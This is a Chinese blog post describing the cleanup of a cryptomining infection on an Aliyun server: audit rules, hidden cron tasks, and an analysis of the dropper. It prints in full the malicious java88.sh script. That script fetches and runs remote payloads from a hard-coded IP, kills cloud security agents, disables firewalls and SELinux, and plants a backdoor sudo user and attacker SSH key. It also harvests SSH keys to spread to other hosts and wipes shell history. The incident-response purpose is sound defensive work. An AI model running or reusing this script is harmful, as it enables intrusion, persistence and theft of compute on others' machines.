文章目录

  • 现象
  • 解决方法
    • 1. 使用audit监控`pam_unix.so`文件
    • 2. 查找cron隐藏命令
  • 挖矿脚本分析
  • 总结

现象

某天开始使用正确的用户名/密码无法SSH登录服务

即使用阿里云的vnc登录,输入完用户名之后就出现login incorrect的错误。

查看登录日志如下:

通过工单请阿里云运维帮忙解决,他们发现pam_unix.so文件会被篡改。但是他们并未彻底解决问题。


使用stat查看文件的情况:

图1:重新安装pam之后的状态

图2:过几分钟发现pam_unix.so被修改了

从现象了解到我们的ssh登录被劫持了,以下是解决方法。

解决方法

1. 使用audit监控pam_unix.so文件

安装方法参考:《在 Linux 下监控程序修改文件》

(1) 配置监测规则

# vi /etc/audit/rules.d/audit.rules
-a always,exit -F path=/usr/lib64/security/pam_unix.so -F perm=warx -F key=keyword-for-filter-log

(2)重启 audit 服务

service auditd restart

(3)检查 audit 规则

# auditctl -l
-a always,exit -F path=/path/to/file -F perm=warx -F key=pam_unix-filter

(4)重装pam

# yum reinstall pam

(5)等待几分钟,查看程序被修改情况

# ausearch -k pam_unix-filter

当时的日志没有保留,为了形象,贴出的是最近的日志:

发现crond程序在修改文件。可是使用crontab -l并没有看到修改程序。

2. 查找cron隐藏命令

(1)查看当前的定时任务列表

#  ll /var/spool/cron/

(2)查看隐藏定时任务

# cat -A /var/spool/cron/root

发现该文件里面有许多我们不知道的定时任务:

从截图可以看出:拷贝了我们服务器上的部分文件,然后将挖矿脚本定时任务隐藏在了里面。

其中crontab隐藏任务的方法可以参考:《linux-隐藏你的crontab后门》

删除该文件,用做研究,并依此删除对应的文件。

同时,筛选出所有的定时任务如下:

拷贝该定时任务脚本出来,进行分析。

# mv /var/spool/cron/root /var/spool/cron/root.bk
# touch /var/spool/cron/root

挖矿脚本分析

分析其中的一个脚本 java88.sh,该脚本的分析流程参考:《Linux watchdogs 感染性隐藏挖矿病毒入侵还原录》
总结起来的步骤如下:

  1. 关闭定时任务
  2. 删除ssh登录信息
  3. 删除下载的应用程序、其他脚本
  4. 删除创建的所有目录
  5. 删除重命名的命令,可以使用md5sum检查。比如cd1这个命令与wgetmd5值相同。

备注:需要对所有脚本执行上面的步骤

脚本内容如下:

#!/bin/bash -eVERSION=2.22if [ -f "/etc/.system/java/java8_8.log" ]
thenecho "process possible running"current=$(date +%s)last_modified=$(stat -c "%Y" /etc/.system/java/java8_8.log)if [ $(($current-$last_modified)) -gt 600 ]; thenecho "no rr process running";elseecho "rr process running"exit 1fi
else echo "rr process not running"
ficurl -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash
cd1 -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash
cc1 -fsSL http://65.108.48.150/java8-py/make-rr.sh | bash export RRHOME=/etc/.system/java
mkdir $RRHOME -prm -rf /var/log/syslog
rm -rf /etc/.system/rtm
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
if ps aux | grep -i '[a]liyun'; thencurl http://update.aegis.aliyun.com/download/uninstall.sh | bashcurl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctl disable aliyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor
elseexport ARCH=amd64if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor elseecho "ali cloud monitor not running"fi
fi
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegisecho "RR mining setup script v$VERSION."
echoif [ "$(id -u)" == "0" ]; thenecho "WARNING: Generally it is not adviced to run this script under root"
fi# command line arguments
WALLET=RGj5X7QRq53FRUjCC1pGE722LBYqbiEQm6
EMAIL=$1 # this one is optional# active 1GB pages
sysctl -w vm.nr_hugepages=$(nproc)for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d);
doecho 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages";
doneecho "1GB pages successfully enabled"# checking prerequisitesif [ -z $WALLET ]; thenecho "Script usage:"echo "> setup_rr_miner.sh <wallet address> [<your email address>]"echo "ERROR: Please specify your wallet address"exit 1
fiWALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 -a ${#WALLET_BASE} != 34 ]; thenecho "ERROR: Wrong wallet base address length (should be 95 or 34): ${#WALLET_BASE}"exit 1
fiif [ -z $RRHOME ]; thenecho "ERROR: Please define HOME environment variable to your home directory"exit 1
fiif [ ! -d $RRHOME ]; thenecho "ERROR: Please make sure HOME directory $RRHOME exists or set it yourself using this command:"echo '  export RRHOME=<dir>'exit 1
fi#check curl, wget
if ! command -v curl &> /dev/null
thenecho "curl could not be found, will install..."apt-get install curl -yyum install curl -y
fi
if ! command -v wget &> /dev/null
thenecho "wget could not be found, will install..."apt-get install wget -yyum install wget -y
fiif ! type lscpu >/dev/null; thenecho "WARNING: This script requires \"lscpu\" utility to work correctly"
fiif ! sudo -n true 2>/dev/null; thenecho "Since I can't do passwordless sudo, mining in background will started from your $RRHOME/.profile file first time you login this host after reboot."
elseecho "Mining in background will be performed using moneroocean_miner systemd service."
fi# start doing stuff: preparing minerecho "[*] Removing previous rr miner (if any)"
if sudo -n true 2>/dev/null; thensudo systemctl stop java88.service
fi
killall -9 xmrigecho "[*] Downloading rr advanced version of java8_8 to /tmp/"
curl -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
curl -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid cc1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
cc1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid cd1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8" -o $RRHOME/java8_8
cd1 -L --progress-bar "http://65.108.48.150/f220115rr/s/java8_8.pid" -o $RRHOME/java8_8.pid chmod +x $RRHOME/java8_8
chmod +x $RRHOME/java8_8.pidecho "[*] Miner $RRHOME/java8_8 is OK"PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'`sed -i 's/"1gb-pages": *false,/"1gb-pages": true,/' $RRHOME/java8_8.pid
sed -i 's/"algo": *null,/"algo": "gr",/' $RRHOME/java8_8.pid
sed -i 's/"tls": *false,/"tls": true,/' $RRHOME/java8_8.pid
sed -i 's/"keepalive": *false,/"keepalive": true,/' $RRHOME/java8_8.pid
sed -i 's/"url": *"[^"]*",/"url": "eu-rtm.pool-server.com:5555",/' $RRHOME/java8_8.pid
sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'.'$PASS'",/' $RRHOME/java8_8.pid
sed -i 's/"pass": *"[^"]*",/"pass": "x",/' $RRHOME/java8_8.pid
sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $RRHOME/java8_8.pid
sed -i 's#"log-file": *null,#"log-file": "'$RRHOME/java8_8.log'",#' $RRHOME/java8_8.pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $RRHOME/java8_8.pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' $RRHOME/java8_8.pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 75,/' $RRHOME/java8_8_background.pidcp $RRHOME/java8_8.pid $RRHOME/java8_8_background.pid
sed -i 's/"background": *false,/"background": true,/' $RRHOME/java8_8_background.pid# preparing scriptecho "[*] Creating $RRHOME/miner.sh script"
cat >$RRHOME/miner.sh <<EOL
#!/bin/bash
if ! pidof java8_8 >/dev/null; thennice $RRHOME/java8_8 \$*
elseecho "RAPTOREUM miner is already running in the background. Refusing to run another one."echo "Run \"killall java8_8\" or \"sudo killall java8_8\" if you want to remove background miner first."
fi
EOLchmod +x $RRHOME/miner.sh# preparing script background work and work under rebootif ! sudo -n true 2>/dev/null; thenif ! grep miner.sh $RRHOME/.profile >/dev/null; thenecho "[*] Adding $RRHOME/miner.sh script to $RRHOME/.profile"echo "$RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1" >>$RRHOME/.profileelse echo "Looks like $RRHOME/miner.sh script is already in the $RRHOME/.profile"fiecho "[*] Running miner in the background (see logs in $RRHOME/java8_8.log file)"/bin/bash $RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1
elseif [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; thenecho "[*] Enabling huge pages"echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.confsudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))fiif ! type systemctl >/dev/null; thenecho "[*] Running miner in the background (see logs in $RRHOME/java8_8.log file)"/bin/bash $RRHOME/miner.sh --config=$RRHOME/java8_8_background.pid >/dev/null 2>&1echo "ERROR: This script requires \"systemctl\" systemd utility to work correctly."echo "Please move to a more modern Linux distribution or setup miner activation after reboot yourself if possible."elseecho "[*] Creating rr_miner systemd service"cat >/tmp/java88.service <<EOL
[Unit]
Description=RTM miner service[Service]
ExecStart=$RRHOME/java8_8 --config=$RRHOME/java8_8.pid
Restart=always
Nice=10
CPUWeight=1[Install]
WantedBy=multi-user.target
EOLsudo mv /tmp/java88.service /etc/systemd/system/java88.serviceecho "[*] Starting rr_miner systemd service"sudo killall xmrig 2>/dev/nullsudo systemctl daemon-reloadsudo systemctl enable java88.servicesudo systemctl start java88.serviceecho "To see miner service logs run \"sudo journalctl -u rr_miner -f\" command"fi
fiecho ""RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWh4GJVPXi1DjSOxs4ytVtVT/XogOlBzAoWn5qE4yyO6EXRz1FhC+EVY9hmUcjMUN1Rp7dYZMLO1vsWhhpqmX9H0YWV2JfKixcXKE2eNrKxl45IRrhIRqNYzr/QnsmLdXZl5OLqoo587jwMCZeWB10NuOiUv5PKVCKUNtT2MQxKv/n5HleqY1Nn9uzFEiIkD39dmqm/4gKPbAcz3uXi31yVVSvUdmqoUoj8B/EdQn182z/Ix+WUJWAuYD2WTrhhYbcDvi+MSOm9ld7MgeOpxzLSEJjEja4+2EHD7dkoNLMD9/UH4FW3yzt3kTUBdaeGJN0mndoex3IggihB5dMjuTnKp25iv6xzYXRCaupxnsRN2rYQlbda8+jZOTxF+nwRGeX9QeSthlQzzZyxEHT7USxQCBpvlyyTZJ9ugX/j11XkKdAGzmKZGo7F0Qxp173eL0SH+6roqrQcXL85r5OPjUd9Xt9fHz2zskN/urYcp6Oi+9kjQgWY0NcjMu/H5YaPP8= wolf@wolfs-MacBook-Pro.local"grep -q hilde /etc/passwd || chattr -ia /etc/passwd;
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow;
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR*&5kloie4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers;
grep -q hilde /etc/sudoers || echo 'hilde  ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoersmkdir /run/network/.ssh/ -p
touch /run/network/.ssh/authorized_keys
touch /run/network/.ssh/authorized_keys2
chmod 600 /run/network/.ssh/authorized_keys
chmod 600 /run/network/.ssh/authorized_keys2
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys || chattr -ia /run/network/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys || echo $RSAKEY > /run/network/.ssh/authorized_keys; chattr +ia /run/network/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys2 || chattr -ia /run/network/.ssh/authorized_keys2;
grep -q wolf@wolfs-MacBook-Pro.local /run/network/.ssh/authorized_keys2 || echo $RSAKEY > /run/network/.ssh/authorized_keys2; chattr +ia /run/network/.ssh/authorized_keys2;
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys;
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2;
grep -q wolf@wolfs-MacBook-Pro.local /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2echo "Port 11222" >> /etc/ssh/sshd_config
echo "Protocol 2" >> /etc/ssh/sshd_config
echo "ListenAddress 0.0.0.0" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile  .ssh/authorized_keys" >> /etc/ssh/sshd_configchattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontabcrontab -l 2>/dev/null
echo "*/30 * * * * root curl -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo "*/30 * * * * root cd1 -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo "*/30 * * * * root cc1 -fsSL http://65.108.48.150/f220305r/java8.sh | bash " >> /etc/crontab
echo crontab created
touch -d 20180515 /etc/crontabchattr -R +ia /var/spool/cron
chattr +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.dtouch -d 20151212 /etc/.system
touch -d 20181212 /etc/crontablocalgo() {KEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*' | grep -vw pub)KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')KEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")HOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)USERZ=$(echo "root"find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -v "\.ssh")userlist=$(echo $USERZ | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)keylist=$(echo "$KEYS $KEYS2 $KEYS3" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)for user in $userlist; dofor host in $hostlist; dofor key in $keylist; dochmod +r $key; chmod 400 $keyssh -o StrictHostKeyChecking=no -o BatchMode=yes -o ConnectTimeout=5 -i $key $user@$host "(curl -fsSL  http://65.108.48.150/f220305r/java8.sh||cd1 -fsSL  http://65.108.48.150/f220305r/java8.sh||cc1 -fsSL  http://65.108.48.150/f220305r/java8.sh) | bash"donedonedone}if [ ! -f "/var/tmp/.alsp" ];
thenlocalgoecho 'lockfile' > /var/tmp/.alspchattr +i /var/tmp/.alsp
elseecho "replay .. i know this server ..."exit
fimv /usr/bin/curl /usr/bin/cc1
mv /usr/bin/url /usr/bin/uu1
mv /usr/bin/wget /usr/bin/ww1
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/cd1 /usr/bin/cc1echo "[*] Setup compXlete"
curl ldfx58.ceye.io
cd1 ldfx58.ceye.io
cc1 ldfx58.ceye.io
history -c

总结

从定时任务里面看到如下信息,怀疑此次挖矿的程序是通过redis的默认端口、帐号密码登录进来

所以,以后安装任何可以远程访问的服务:
(1)必须修改默认端口和帐号密码,然后才能开放远程访问;
(2)并且尽量将权限设置好一些。
(3)记得服务器重要数据备份。

整个过程使用到的命令有:

  • stat
  • audit
  • chattr
  • ……

清除阿里云服务器挖矿程序过程相关推荐

  1. 阿里云服务器挖矿程序解决流程

    阿里云服务器挖矿程序解决流程 问题表象 定位解决问题 问题表象 1.CPU满负载 进入root用户执行top命令: 2. 应用进程被杀 ./startWebLogic.sh: line 184: 23 ...

  2. 记:解决阿里云服务器挖矿程序恶意进程

    今天手机上午收到如下信息(出问题的服务器是平常自己用来测试的服务器,并没有设置任何防护): 解决过程: 1.登录上服务器发先服务器非常卡,直接使用top -c命令检查进程CPU的占用率,果然发现了问题 ...

  3. 阿里云服务器购买搭建过程

    阿里云服务器搭建 1.购买服务器 2.阿里云配置服务器 3.连接服务器 4.服务器电脑配置 5.阿里云权限配置 6.运行访问 1.购买服务器 在示例中购买的为阿里云服务器,在校大学生可以购买阿里云的学 ...

  4. 在阿里云服务器部署程序并用域名直接访问

    一般买服务器只有公网的IP地址,也就是类似10.205.25.32这种形式的.如何想用域名(例如www.baidu.com)直接访问的你网站,可以在阿里云直接再买个域名,将域名解析绑定ip地址. 这里 ...

  5. 云服务器建站原理_第一篇博客---阿里云服务器建站过程(小菜鸟的第一次尝试)...

    最近学习了前后端的相关技术,就想租一个服务器试一下,玩一玩,简单了解了一下阿里云的服务器,简单介绍一下: 一:什么是云服务器ECS 是阿里云产品体系中,最基础的计算服务,通常用作应用程序的运行环境,最 ...

  6. 阿里云服务器提示挖矿程序 该怎么解决

    阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安 ...

  7. 【转载】阿里云服务器忘记了实例密码怎么办

    在阿里云服务器运维过程中,有时候可能会忘记了服务器的实例密码,那忘记了阿里云Windows服务器或者Centos服务器的实例密码怎么办?其实阿里云的ECS后台管理页面提供了重置实例密码的功能,运维人员 ...

  8. 记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程(一摸一样,只是没查到怎么进来的,入侵)

    centos 7 记一次阿里云服务器被被种挖矿程序解决的过程 1.原因 偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下 2.查看进程 1 [root@izwz94xp1kwkca ...

  9. 阿里云服务器处理挖矿程序过程

    登录阿里云服务器终端,执行top命令,发现有一个进程netflix占用了98%的cpu,消耗了我的CPU积分,阿里云CPU积分被消耗后,网速就会变慢. 判定其为挖矿程序后,干他 解决办法: # 1.进 ...

最新文章

  1. 如何判断 cxgrid 双击了哪一列_唐卡的价值主要体现在哪 如何判断唐卡的价值
  2. mysql新增json_MySQL5.7中新增的JSON类型的使用方法
  3. spring19:AspectJ的初步介绍
  4. ASP.NET MVC涉及到的5个同步与异步,你是否傻傻分不清楚?[下篇]
  5. navicat 8 mysql生成关系_MySQL数据库通过navicat建立多对多关系
  6. 用ppt画科研论文的图如何转eps
  7. 关于链表的面试题(持续更新)
  8. MySQL-5.7.21非图形化下载、安装、连接问题记录
  9. asp.NET自定义服务器控件内部细节系列教程一
  10. python扫描器甄别操作系统类型_20189317 《网络攻防技术》 第三周作业
  11. php电子商务模板,关于php:电商系统设计之运费模板下
  12. Linux-定时任务(Crontab)基本用法
  13. 排序算法-快速排序(入门)
  14. @retention注解作用_前端初学SpringBoot系列(三)自定义注解的学习与练习
  15. win10 x64+VS2017社区版+OpenCV3.2.0安装
  16. 宾州州立计算机科学世界排名,宾州州立大学帕克分校qs世界排名
  17. 生理学_神经系统的功能
  18. 小说:凡人修仙路基础
  19. 数据结构如何申请一个空间的队列_如何用鞋柜来作为隔断,隔出一个玄关空间...
  20. STM32实战(1):搭建模板工程

热门文章

  1. 购买虚拟服务器费用入什么科目,购买的云服务器费用入什么科目
  2. 闲人闲谈PS之三十——新收入准则中的合同资产和合同负债
  3. python网页转PDF
  4. Android 10 默认输入法
  5. iPad goodnotes 5 打开很慢“准备自己的资料库,获得更快体验”解决
  6. 开源库3dTagCloudAndroid使用,实现3D球形云标签tag效果
  7. jsp实验中:tag文件报java.util.ArrayList cannot be cast to java.lang.String
  8. 11 月中国手游海外收入排行:米哈游《原神》第一,《使命召唤手游》第二
  9. Java设计模式面试题(一)
  10. mc服务器语音,浸入式语音(Immersive Voice)|我的世界1.12.2版本